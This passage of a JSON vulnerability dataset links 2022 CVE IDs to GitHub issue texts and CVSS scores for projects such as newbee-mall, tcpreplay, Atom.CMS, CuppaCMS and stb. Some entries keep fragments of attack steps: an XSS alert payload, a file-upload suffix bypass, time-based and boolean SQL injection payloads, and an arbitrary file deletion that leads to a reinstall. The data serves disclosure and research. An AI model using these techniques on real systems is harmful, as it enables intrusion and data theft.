  81592. "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/64",
  81593. "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/64",
  81594. "Repo_new": "newbee-ltd/newbee-mall",
  81595. "Issue_Created_At": "2022-03-03T03:11:37Z",
  81596. "description": "There is a Cross site scripting vulnerability exists in newbee mall. FILETAG APITAG APITAG alert(\u201cxss\u201d) APITAG in the input box and click Save to complete the form information submission. FILETAG FILETAG APITAG pop up window is triggered when the page is refreshed, and the loophole reproduction is completed FILETAG",
  81597. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  81598. "severity": "MEDIUM",
  81599. "baseScore": 6.1,
  81600. "impactScore": 2.7,
  81601. "exploitabilityScore": 2.8
  81602. },
  81603. {
  81604. "CVE_ID": "CVE-2022-27477",
  81605. "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/63",
  81606. "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/63",
  81607. "Repo_new": "newbee-ltd/newbee-mall",
  81608. "Issue_Created_At": "2022-03-03T02:35:48Z",
  81609. "description": "There is a File upload vulnerability exists in newbee mall. FILETAG APITAG burpsuite packet capturing agent and click to upload pictures. FILETAG NUMBERTAG By default, the system only supports JPG, PNG and GIF files. We can bypass them by modifying the file suffix. FILETAG APITAG the value of filename to FILETAG FILETAG Get the access path to file upload FILETAG Complete data update FILETAG APITAG the upload file path, and the vulnerability reproduction is completed. FILETAG FILETAG",
  81610. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81611. "severity": "CRITICAL",
  81612. "baseScore": 9.8,
  81613. "impactScore": 5.9,
  81614. "exploitabilityScore": 3.9
  81615. },
  81616. {
  81617. "CVE_ID": "CVE-2022-27607",
  81618. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/677",
  81619. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/677",
  81620. "Repo_new": "axiomatic-systems/bento4",
  81621. "Issue_Created_At": "2022-03-13T16:49:47Z",
  81622. "description": "FILETAG POC FILETAG",
  81623. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  81624. "severity": "HIGH",
  81625. "baseScore": 8.1,
  81626. "impactScore": 5.2,
  81627. "exploitabilityScore": 2.8
  81628. },
  81629. {
  81630. "CVE_ID": "CVE-2022-27820",
  81631. "Issue_Url_old": "https://github.com/zaproxy/zaproxy/issues/7165",
  81632. "Issue_Url_new": "https://github.com/zaproxy/zaproxy/issues/7165",
  81633. "Repo_new": "zaproxy/zaproxy",
  81634. "Issue_Created_At": "2022-03-24T09:53:42Z",
  81635. "description": "Do not use ZAP CA cert for untrusted certs ( CVETAG ). This was originally reported to ZAP via APITAG We rated it as a LOW vulnerability and gave the reporter permission to disclose it, which they have done as CVETAG URLTAG . We have rated it as LOW as we expect ZAP users to know about the sites they are testing and to know not to send any sensitive information to those sites when testing them with ZAP. If testing potentially malicious sites then ZAP users should know to take additional precausions, such as running ZAP in a container environment. If you disagree with our assessment then please comment on this issue. We would have no problem with one of the suggested solutions being implemented but do not believe that this should be the default option. ZAP is heavily used in development environments where self signed certificates are common. Note that ZAP _does_ validate the certificates for the Check For Update functionality to ensure that malcious ZAP updates cannot be downloaded from an untrusted site. From the original report: Summary ZAP proxy does not verify the certificate chain of the HTTPS servers it connects to. For example, it connects without warning to servers presenting a self signed certificate, an expired certificate, etc. This opens up a browser configured to use ZAP as an intercepting proxy to NUMBERTAG man in the middle attacks NUMBERTAG DNS rebinding attacks (to HTTPS servers configured as default virtual server). Impact Man in the middle attack A user should currently avoid sending sensible information when using a browser through ZAP. In particular, he should avoid connecting using real accounts. Moreover, the user should avoid using an existing browser profile and always use a dedicated profile in order to avoid getting already existing sessions hijacked by a man in the middle. DNS rebinding attacks Moreover, a malicious web site could conduct a DNS rebinding attack on some HTTPS services which are usually not vulnerable to DNS rebinding attacks. The certificate chain validation usually blocks DNS rebinding against HTTPS sites. However, as this step is disabled when using ZAP as an intercepting proxy, any HTTPS site which is configured as the default virtual host ends up being vulnerable to DNS rebinding attacks. The attacker could use the user browser to try to attack such a vulnerable site while hiding behing the IP address of the ZAP user. For example, he could try to: brute force passwords; send stored XSS payload; send abusive posts, comments, spam, etc. Another interesting approach would be to attacks HTTPS services hosted in the user internal network, possibly bypassing firewalls, WAFs, etc. Details When connecting to a self signed invalid certificate, ZAP generates a valid generated from its own certificate authority. This certificate is configured as trusted in the browser in order to make the TLS interception work. As a consequence, the browser silently connects to this certificate. Resolution Mirroring the status of the original certificate chain This could be fixed by using the following behaviour by default: not generate a certificate signed by ZAP internal CA when the HTTPS server presents an untrusted certificate chain; replicate the validity period of the original certificate when generating its own server certificate. Using this approach, the user would be warned against invalid certificate chains but could choose to ignore the error by using the same procedure he would use without the intercepting proxy. FILETAG use a similar approach. Rejecting invalid certificate chains Another approach is to refuse the connection when the certificate chain is invalid. This approach is simpler to implement but not as convenient for the user who cannot easily the error. For example, when trying to connect HTTPS site presenting a self signed expired certificate, mitmproxy presents a certificate which is accepted by the browser but any HTTP request results in NUMBERTAG error APITAG Gateway). This HTTP error includes a message explaining the reason of the error such as: Certificate verification error for APITAG certificate has expired (errno NUMBERTAG depth NUMBERTAG Certificate verification error for APITAG Hostname mismatch (errno NUMBERTAG depth NUMBERTAG Certificate verification error for self APITAG self signed certificate (errno NUMBERTAG depth NUMBERTAG Certificate verification error for untrusted APITAG self signed certificate in certificate chain (errno NUMBERTAG depth NUMBERTAG ERRORTAG establish TLS with APITAG (sni: None): ERRORTAG validate certificate hostname without SNI')\")",
  81636. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N",
  81637. "severity": "MEDIUM",
  81638. "baseScore": 4.0,
  81639. "impactScore": 1.4,
  81640. "exploitabilityScore": 2.2
  81641. },
  81642. {
  81643. "CVE_ID": "CVE-2022-27920",
  81644. "Issue_Url_old": "https://github.com/kiwix/libkiwix/issues/728",
  81645. "Issue_Url_new": "https://github.com/kiwix/libkiwix/issues/728",
  81646. "Repo_new": "kiwix/libkiwix",
  81647. "Issue_Created_At": "2022-03-23T13:41:50Z",
  81648. "description": "Release NUMBERTAG Following remark from MENTIONTAG at URLTAG Thanks, so URLTAG was only included in NUMBERTAG no released Debian versions are affected, just unstable). Could we do a NUMBERTAG release with just this cherry picked? I note that even APITAG is vulnerable to this. Or if NUMBERTAG is coming pretty soon then waiting wouldn't be too bad. And we should also get a CVE ID assigned for this vulnerability, MENTIONTAG if you haven't gone through this FILETAG before I'm happy to help out. I also believe we should not wait to much to make the release of NUMBERTAG Secure the CI is green on git master [ ] Kiwix Build is OK [ ] Update the Changelog [ ] Update version [ ] Close current milestone and create new one incrementaly (_a priori_ a minor version) [ ] Create a tag on git [ ] Secure new source/sbinaries are published on FILETAG [ ] Update the Github release with the Changelog [ ] Create new empty entry in Changelog (placeholder for future entries) [ ] Publicize these new versions",
  81649. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  81650. "severity": "MEDIUM",
  81651. "baseScore": 6.1,
  81652. "impactScore": 2.7,
  81653. "exploitabilityScore": 2.8
  81654. },
  81655. {
  81656. "CVE_ID": "CVE-2022-27938",
  81657. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/163",
  81658. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/163",
  81659. "Repo_new": "saitoha/libsixel",
  81660. "Issue_Created_At": "2022-03-19T20:57:10Z",
  81661. "description": "FILETAG POC FILETAG",
  81662. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81663. "severity": "MEDIUM",
  81664. "baseScore": 5.5,
  81665. "impactScore": 3.6,
  81666. "exploitabilityScore": 1.8
  81667. },
  81668. {
  81669. "CVE_ID": "CVE-2022-27939",
  81670. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/717",
  81671. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/717",
  81672. "Repo_new": "appneta/tcpreplay",
  81673. "Issue_Created_At": "2022-03-04T08:24:03Z",
  81674. "description": "Bug] Reachable assertion in get_layer NUMBERTAG You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug The assertion APITAG in APITAG at APITAG is reachable when the user uses tcprewrite to open a crafted pcap file. To Reproduce Steps to reproduce the behavior NUMBERTAG export CC=clang && export CFLAGS=\" fsanitize=address g NUMBERTAG FILETAG && ./configure disable shared disable local libopts && make clean && make j NUMBERTAG src/tcprewrite o /dev/null i POC output: ERRORTAG Expected behavior Program reports assertion failure and is terminated. Screenshots FILETAG System (please complete the following information): OS: Ubuntu OS version : can be reproduced in NUMBERTAG Clang version : clang NUMBERTAG release NUMBERTAG Tcpreplay Version : latest commit APITAG Acknowledgement FILETAG",
  81675. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81676. "severity": "MEDIUM",
  81677. "baseScore": 5.5,
  81678. "impactScore": 3.6,
  81679. "exploitabilityScore": 1.8
  81680. },
  81681. {
  81682. "CVE_ID": "CVE-2022-27940",
  81683. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/718",
  81684. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/718",
  81685. "Repo_new": "appneta/tcpreplay",
  81686. "Issue_Created_At": "2022-03-04T08:32:27Z",
  81687. "description": "Bug] heap overflow in get_ip NUMBERTAG next. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug There is a heap overflow bug found in get_ip NUMBERTAG next, can be triggered via tcprewrite + APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG export CC=clang && export CFLAGS=\" fsanitize=address g NUMBERTAG FILETAG && ./configure disable shared disable local libopts && make clean && make j NUMBERTAG PATHTAG o /dev/null i POC output: ERRORTAG Screenshots FILETAG System (please complete the following information): OS: Ubuntu OS version : can be reproduced in NUMBERTAG clang version NUMBERTAG release NUMBERTAG Tcpreplay Version : latest commit APITAG Acknowledgement FILETAG )",
  81688. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81689. "severity": "HIGH",
  81690. "baseScore": 7.8,
  81691. "impactScore": 5.9,
  81692. "exploitabilityScore": 1.8
  81693. },
  81694. {
  81695. "CVE_ID": "CVE-2022-27941",
  81696. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/716",
  81697. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/716",
  81698. "Repo_new": "appneta/tcpreplay",
  81699. "Issue_Created_At": "2022-03-03T19:41:11Z",
  81700. "description": "Bug] heap overflow in get_l2len_protocol. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug There is a heap overflow bug found in get_l2len_protocol, can be triggered via tcpprep + APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG export CC=clang NUMBERTAG export CFLAGS=\" fsanitize=address g NUMBERTAG FILETAG && ./configure disable shared disable local libopts && make clean && make j NUMBERTAG PATHTAG auto=bridge pcap=$POC PATHTAG Expected behavior APITAG report that ./tcpprep has a heap buffer overflow in function get_l2len_protocol ERRORTAG Screenshots FILETAG System (please complete the following information): OS: Ubuntu (can be reproduced in NUMBERTAG Tcpreplay Version (latest commit APITAG Additional context Add any other context about the problem here.",
  81701. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81702. "severity": "HIGH",
  81703. "baseScore": 7.8,
  81704. "impactScore": 5.9,
  81705. "exploitabilityScore": 1.8
  81706. },
  81707. {
  81708. "CVE_ID": "CVE-2022-27942",
  81709. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/719",
  81710. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/719",
  81711. "Repo_new": "appneta/tcpreplay",
  81712. "Issue_Created_At": "2022-03-14T09:44:16Z",
  81713. "description": "Bug] heap buffer overflow in parse_mpls. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug There is a heap overflow bug found in parse_mpls, can be triggered via tcpprep+ APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG export CC=clang && export CFLAGS=\" fsanitize=address g NUMBERTAG FILETAG && ./configure disable shared disable local libopts && make clean && make j NUMBERTAG PATHTAG auto=bridge pcap=$POC PATHTAG Output: ERRORTAG System (please complete the following information): OS: Ubuntu NUMBERTAG Clang NUMBERTAG Tcpreplay Version : latest commit APITAG Acknowledgement FILETAG POC FILETAG",
  81714. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81715. "severity": "HIGH",
  81716. "baseScore": 7.8,
  81717. "impactScore": 5.9,
  81718. "exploitabilityScore": 1.8
  81719. },
  81720. {
  81721. "CVE_ID": "CVE-2022-27962",
  81722. "Issue_Url_old": "https://github.com/xunyang1/my-vulnerability/issues/1",
  81723. "Issue_Url_new": "https://github.com/xunyang1/my-vulnerability/issues/1",
  81724. "Repo_new": "xunyang1/my-vulnerability",
  81725. "Issue_Created_At": "2022-03-21T02:49:26Z",
  81726. "description": "Bluecms NUMBERTAG has an SQL injection vulnerability at cooike. APITAG Find by rerce Bluecms NUMBERTAG download page : FILETAG vulnerability code: FILETAG line NUMBERTAG FILETAG For the $user_name parameter above\uff0cjust passed in the addslashes function FILETAG Moreover, it can be seen from the configuration file that GB NUMBERTAG encoding is adopted, so wide byte injection can be considered to bypass addslashes. FILETAG When we enter Cookie: BLUE FILETAG payload: Cookie: BLUE FILETAG Successful delay NUMBERTAG s. APITAG The same problem appears on line NUMBERTAG FILETAG follow FILETAG Same as the previous problem.the $user_name parameter above\uff0cjust passed in the addslashes function APITAG BLUE FILETAG Successful delay NUMBERTAG s.",
  81727. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81728. "severity": "CRITICAL",
  81729. "baseScore": 9.8,
  81730. "impactScore": 5.9,
  81731. "exploitabilityScore": 3.9
  81732. },
  81733. {
  81734. "CVE_ID": "CVE-2022-27984",
  81735. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/30",
  81736. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/30",
  81737. "Repo_new": "cuppacms/cuppacms",
  81738. "Issue_Created_At": "2022-03-21T16:24:23Z",
  81739. "description": "SQL injection vulnerability exists in APITAG PATHTAG VULNERABLE: SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the \"menu_filter NUMBERTAG parameters. Contact me: EMAILTAG APITAG Payload Boolean true: menu_filter NUMBERTAG and NUMBERTAG Payload Boolean false: menu_filter NUMBERTAG and NUMBERTAG Payload exploit example: APITAG Proof of concept (POC): FILETAG Payload Boolean true: menu_filter NUMBERTAG and NUMBERTAG FILETAG Payload Boolean false: menu_filter NUMBERTAG and NUMBERTAG You can see that the two return packets are different FILETAG Exploit: FILETAG",
  81740. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81741. "severity": "CRITICAL",
  81742. "baseScore": 9.8,
  81743. "impactScore": 5.9,
  81744. "exploitabilityScore": 3.9
  81745. },
  81746. {
  81747. "CVE_ID": "CVE-2022-27985",
  81748. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/31",
  81749. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/31",
  81750. "Repo_new": "cuppacms/cuppacms",
  81751. "Issue_Created_At": "2022-03-22T16:24:01Z",
  81752. "description": "SQL injection vulnerability exists in APITAG PATHTAG VULNERABLE: SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the APITAG parameters. Github: URLTAG Product: APITAG Impact: Allow attacker inject query and access , disclosure of all data on the system. Payload: ERRORTAG Proof of concept (POC): FILETAG You can see injection code query into APITAG parameters as show below You see database and user as show below in the response FILETAG",
  81753. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81754. "severity": "CRITICAL",
  81755. "baseScore": 9.8,
  81756. "impactScore": 5.9,
  81757. "exploitabilityScore": 3.9
  81758. },
  81759. {
  81760. "CVE_ID": "CVE-2022-28032",
  81761. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/263",
  81762. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/263",
  81763. "Repo_new": "thedigicraft/atom.cms",
  81764. "Issue_Created_At": "2022-03-21T09:10:59Z",
  81765. "description": "SQL Injection vulnerability on FILETAG . Exploit Title: SQL Injection vulnerability on FILETAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version: APITAG NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG PATHTAG FILETAG payload:id=(sleep NUMBERTAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81766. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81767. "severity": "CRITICAL",
  81768. "baseScore": 9.8,
  81769. "impactScore": 5.9,
  81770. "exploitabilityScore": 3.9
  81771. },
  81772. {
  81773. "CVE_ID": "CVE-2022-28033",
  81774. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/259",
  81775. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/259",
  81776. "Repo_new": "thedigicraft/atom.cms",
  81777. "Issue_Created_At": "2022-03-21T08:09:03Z",
  81778. "description": "SQL Injection vulnerability on FILETAG . Exploit Title: SQL Injection vulnerability on FILETAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version: APITAG NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: sleep NUMBERTAG FILETAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81779. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81780. "severity": "CRITICAL",
  81781. "baseScore": 9.8,
  81782. "impactScore": 5.9,
  81783. "exploitabilityScore": 3.9
  81784. },
  81785. {
  81786. "CVE_ID": "CVE-2022-28034",
  81787. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/261",
  81788. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/261",
  81789. "Repo_new": "thedigicraft/atom.cms",
  81790. "Issue_Created_At": "2022-03-21T08:36:04Z",
  81791. "description": "SQL Injection vulnerability on FILETAG . Exploit Title: SQL Injection vulnerability on FILETAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version: APITAG NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: list FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81792. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81793. "severity": "CRITICAL",
  81794. "baseScore": 9.8,
  81795. "impactScore": 5.9,
  81796. "exploitabilityScore": 3.9
  81797. },
  81798. {
  81799. "CVE_ID": "CVE-2022-28035",
  81800. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/260",
  81801. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/260",
  81802. "Repo_new": "thedigicraft/atom.cms",
  81803. "Issue_Created_At": "2022-03-21T08:20:19Z",
  81804. "description": "SQL Injection vulnerability on FILETAG . Exploit Title: SQL Injection vulnerability on FILETAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version: APITAG NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: action=save&db=users APITAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81805. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81806. "severity": "CRITICAL",
  81807. "baseScore": 9.8,
  81808. "impactScore": 5.9,
  81809. "exploitabilityScore": 3.9
  81810. },
  81811. {
  81812. "CVE_ID": "CVE-2022-28036",
  81813. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/262",
  81814. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/262",
  81815. "Repo_new": "thedigicraft/atom.cms",
  81816. "Issue_Created_At": "2022-03-21T08:58:14Z",
  81817. "description": "SQL Injection vulnerability on FILETAG . Exploit Title: SQL Injection vulnerability on FILETAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version: APITAG NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG APITAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81818. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81819. "severity": "CRITICAL",
  81820. "baseScore": 9.8,
  81821. "impactScore": 5.9,
  81822. "exploitabilityScore": 3.9
  81823. },
  81824. {
  81825. "CVE_ID": "CVE-2022-28041",
  81826. "Issue_Url_old": "https://github.com/nothings/stb/issues/1292",
  81827. "Issue_Url_new": "https://github.com/nothings/stb/issues/1292",
  81828. "Repo_new": "nothings/stb",
  81829. "Issue_Created_At": "2022-02-17T15:52:07Z",
  81830. "description": "UBSAN: integer overflow. Describe the bug ERRORTAG and ERRORTAG To Reproduce Built stb according to FILETAG with ERRORTAG UBSAN Output ERRORTAG FILETAG",
  81831. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81832. "severity": "MEDIUM",
  81833. "baseScore": 6.5,
  81834. "impactScore": 3.6,
  81835. "exploitabilityScore": 2.8
  81836. },
  81837. {
  81838. "CVE_ID": "CVE-2022-28042",
  81839. "Issue_Url_old": "https://github.com/nothings/stb/issues/1289",
  81840. "Issue_Url_new": "https://github.com/nothings/stb/issues/1289",
  81841. "Repo_new": "nothings/stb",
  81842. "Issue_Created_At": "2022-02-17T11:13:28Z",
  81843. "description": "APITAG heap use after free in stbi__jpeg_huff_decode. Describe the bug APITAG undefined behavior: index out of bounds + APITAG heap use after free in stbi__jpeg_huff_decode. To Reproduce Built stb according to FILETAG with ERRORTAG ASAN Output ERRORTAG Crashing file FILETAG",
  81844. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81845. "severity": "HIGH",
  81846. "baseScore": 8.8,
  81847. "impactScore": 5.9,
  81848. "exploitabilityScore": 2.8
  81849. },
  81850. {
  81851. "CVE_ID": "CVE-2022-28044",
  81852. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/216",
  81853. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/216",
  81854. "Repo_new": "ckolivas/lrzip",
  81855. "Issue_Created_At": "2022-02-24T18:06:02Z",
  81856. "description": "Deallocation of control >suffix corrupts Heap Memory. The suffix field in the APITAG structure is initialized to point to global memory in initialize_control URLTAG URLTAG and in the lrzip main URLTAG . URLTAG However the field is then treated as a heap allocated variable while freeing the APITAG variable. Both in APITAG URLTAG and when setting a new suffix URLTAG Impact Corrupting the heap state may result in an exploitable vulnerability, especially if initialized with optarg that points to global RW memory. Fix It is sufficient to initialize APITAG using the return value of a strdup of the strings.",
  81857. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81858. "severity": "CRITICAL",
  81859. "baseScore": 9.8,
  81860. "impactScore": 5.9,
  81861. "exploitabilityScore": 3.9
  81862. },
  81863. {
  81864. "CVE_ID": "CVE-2022-28048",
  81865. "Issue_Url_old": "https://github.com/nothings/stb/issues/1293",
  81866. "Issue_Url_new": "https://github.com/nothings/stb/issues/1293",
  81867. "Repo_new": "nothings/stb",
  81868. "Issue_Created_At": "2022-02-17T15:56:39Z",
  81869. "description": "UBSAN: shift exponent is too large. Describe the bug Several ERRORTAG and similar To Reproduce Built stb according to FILETAG with ERRORTAG UBSAN Output ERRORTAG Crashing files FILETAG",
  81870. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81871. "severity": "HIGH",
  81872. "baseScore": 8.8,
  81873. "impactScore": 5.9,
  81874. "exploitabilityScore": 2.8
  81875. },
  81876. {
  81877. "CVE_ID": "CVE-2022-28053",
  81878. "Issue_Url_old": "https://github.com/typemill/typemill/issues/325",
  81879. "Issue_Url_new": "https://github.com/typemill/typemill/issues/325",
  81880. "Repo_new": "typemill/typemill",
  81881. "Issue_Created_At": "2022-03-20T02:42:15Z",
  81882. "description": "NUMBERTAG Unrestricted File Upload Vulnerability. See PDF for details FILETAG :",
  81883. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  81884. "severity": "HIGH",
  81885. "baseScore": 8.8,
  81886. "impactScore": 5.9,
  81887. "exploitabilityScore": 2.8
  81888. },
  81889. {
  81890. "CVE_ID": "CVE-2022-28056",
  81891. "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/66",
  81892. "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/66",
  81893. "Repo_new": "gongfuxiang/shopxo",
  81894. "Issue_Created_At": "2022-03-23T07:33:30Z",
  81895. "description": "A system reinstall vulnerability was found in APITAG Hello, in my code audit process, I found system reinstallation vulnerability in APITAG NUMBERTAG the details are as follows: In APITAG file\uff0c Add function. FILETAG Do not have permission to check visitors, also didn't check whether installed database (check the APITAG exists Then the add function resets the original database data and writes the data submitted in the POST to APITAG , which can be injected into the code, resulting in RCE FILETAG Below is the attacked APITAG CODETAG Then open any page to see the APITAG page",
  81896. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81897. "severity": "CRITICAL",
  81898. "baseScore": 9.8,
  81899. "impactScore": 5.9,
  81900. "exploitabilityScore": 3.9
  81901. },
  81902. {
  81903. "CVE_ID": "CVE-2022-28059",
  81904. "Issue_Url_old": "https://github.com/Verytops/verydows/issues/21",
  81905. "Issue_Url_new": "https://github.com/verytops/verydows/issues/21",
  81906. "Repo_new": "verytops/verydows",
  81907. "Issue_Created_At": "2022-03-23T13:54:45Z",
  81908. "description": "Verydows Exists Arbitrary File Deletion Vulnerability. Vulnerable file: PATHTAG It can be clearly seen that $file is not security filtered Vulnerable code\uff1a APITAG case 'delete': $file = request('file'); $error = APITAG if(!empty($file)) { if(is_array($file)) { foreach($file as $v) { APITAG $error FILETAG NUMBERTAG It can be seen that when the APITAG file exists, when visiting URLTAG the page will directly jump to the front home page FILETAG So as long as we delete the APITAG file, we can reinstall the APITAG we delete the APITAG file and visit URLTAG we will enter the installation wizard page FILETAG Repair suggestion: APITAG ../ or ..\\ in the file variable APITAG the scope of deleted files or directories",
  81909. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  81910. "severity": "HIGH",
  81911. "baseScore": 8.1,
  81912. "impactScore": 5.2,
  81913. "exploitabilityScore": 2.8
  81914. },
  81915. {
  81916. "CVE_ID": "CVE-2022-28067",
  81917. "Issue_Url_old": "https://github.com/sandboxie-plus/Sandboxie/issues/1714",
  81918. "Issue_Url_new": "https://github.com/sandboxie-plus/sandboxie/issues/1714",
  81919. "Repo_new": "sandboxie-plus/sandboxie",
  81920. "Issue_Created_At": "2022-03-23T03:02:42Z",
